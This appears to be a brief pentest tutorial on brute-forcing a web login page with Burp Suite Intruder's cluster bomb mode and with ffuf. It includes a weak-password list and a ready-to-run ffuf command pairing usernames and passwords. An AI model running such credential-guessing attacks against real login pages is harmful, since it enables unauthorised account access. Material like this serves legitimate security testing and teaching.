Brute Force Login Page (Cluster Bomb With Burp Suite)

  • username file : /usr/share/seclists/Usernames/top-usernames-shortlist.txt
  • pass file : pass.txt
~ cat pass.txt

123456
password
password123
letmein

Capture login request and send this request to burp intruder, then select attack type cluster bomp then highligt attacing value then select payloads and start attack

Image

Image

Image

Image

Image

Image

Brute Force Login Page (Cluster Bomb With ffuf)

Capture login request and edit attack points and save it

Image

then attack with ffuf

ffuf -request req.txt -request-proto http -mode clusterbomb -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt:FUZZUSER -w pass.txt:FUZZPASSWORD -fs 3256,3356